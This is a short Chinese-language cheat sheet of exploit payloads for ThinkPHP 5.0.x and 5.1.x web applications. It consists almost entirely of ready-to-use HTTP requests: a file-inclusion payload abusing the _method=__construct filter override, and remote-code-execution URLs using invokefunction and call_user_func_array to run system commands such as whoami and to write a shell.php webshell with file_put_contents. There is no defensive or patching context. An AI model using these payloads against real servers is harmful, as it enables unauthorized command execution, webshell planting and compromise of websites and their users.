thinkphp5的漏洞

tp5.1.x
文件包含:
http://ip/index.php?s=captcha&m=1
post提交:
_method=__construct&filter[]=think__include_file&get[]=/home/www/test3/public/1.txt&method=get&server[]=

tp5.0.x

代码执行漏洞:
POST请求
http://ip/index.php
_method=__construct&filter[]=system&method=GET&get[]=dir

GET请求
http://ip/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

http://ip/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

http://ip/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=内容需要url编码

你可能感兴趣的:(漏洞利用)